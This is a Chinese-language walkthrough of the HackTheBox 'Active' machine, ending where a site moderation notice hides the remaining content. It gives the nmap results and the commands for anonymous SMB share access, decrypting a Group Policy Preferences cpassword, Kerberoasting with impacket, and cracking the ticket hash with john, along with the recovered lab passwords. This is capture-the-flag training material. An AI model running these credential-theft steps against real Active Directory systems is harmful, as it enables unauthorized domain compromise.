PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-30 07:58:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3889/tcp filtered dandv-tester
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3m46s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-30T07:59:01
|_ start_date: 2021-12-30T07:55:42
检查smb漏洞
nmap -p 139,445 --script=smb-vuln* -Pn 10.10.10.100
没有能打的
查看smb共享
smbclient --no-pass -L //10.10.10.100
继续探测能否登录进共享,发现Replication可登录
smbclient //10.10.10.100/Replication -U ""%""
本想用smbmap -H 10.10.10.100 -R列出所有文件,但可能网太差了,smbmap连不上。
只能手动翻了
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
获得一组账号密码
根据walkthrough:Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword
. But then Microsoft published the key on MSDN!
使用gpp-decrypt解密(pypykatz也可以)
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
用这组账号密码尝试登录别的share
#网络太慢的话,smbmap连不上的。但是smbclient可以
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
smbclient //10.10.10.100/Users -U "SVC_TGS"%"GPPstillStandingStrong2k18"
在SVC_TGS的桌面找到user.txt
ps.这里还拿不到shell,因为smb共享该用户都不可写
rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
ldap:
nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.100
一长串输出,知道域名是active.htb,配到host里
继续检查域传送漏洞,不存在
dnsrecon -d active.htb -t axfr
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='active.htb'" 10.10.10.100
发现一个Administrator账号
查询服务跑在用户账号下的
sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
保存进文件,用john破解
john --wordlist=/usr/share/wordlists/rockyou.txt tgt.out
得到Administrator的密码Ticketmaster1968
有了账号密码可以通过psexec拿shell了
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。